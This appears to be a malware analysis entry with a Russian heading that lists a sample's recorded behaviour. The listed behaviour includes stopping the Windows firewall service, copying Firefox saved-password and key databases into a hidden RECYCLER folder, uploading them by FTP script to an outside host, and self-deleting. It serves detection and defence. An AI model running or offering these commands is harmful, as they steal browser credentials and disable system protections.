Техническая информация
- '<Текущая директория>\b.txt'
- '%TEMP%\1.tmp\b2e.exe' %TEMP%\1.tmp\b2e.exe <Текущая директория> <Текущая директория>\a.txt
- '<Текущая директория>\a.txt'
- '<SYSTEM32>\net1.exe' start sharedaccess
- '<SYSTEM32>\ftp.exe' -n -s:C:\RECYCLER\vict.ftp
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\selfdel0.bat" "
- '<SYSTEM32>\alg.exe'
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\xcopy.exe' "%APPDATA%\Mozilla\Firefox\signons*.txt" "C:\RECYCLER\Firefox\" /S
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\batfile.bat" "
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\xcopy.exe' "%APPDATA%\Mozilla\Firefox\*.db" "C:\RECYCLER\Firefox\" /S
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
- %TEMP%\selfdel0.bat
- C:\RECYCLER\vict.ftp
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- <Текущая директория>\b.txt
- <Текущая директория>\a.txt
- %TEMP%\2.tmp\batfile.bat
- %TEMP%\1.tmp\b2e.exe
- %TEMP%\2.tmp\batfile.bat
- %TEMP%\1.tmp\b2e.exe
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
- 'ft#.iw-h.de':21
- 'localhost':1038
- DNS ASK ft#.iw-h.de
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'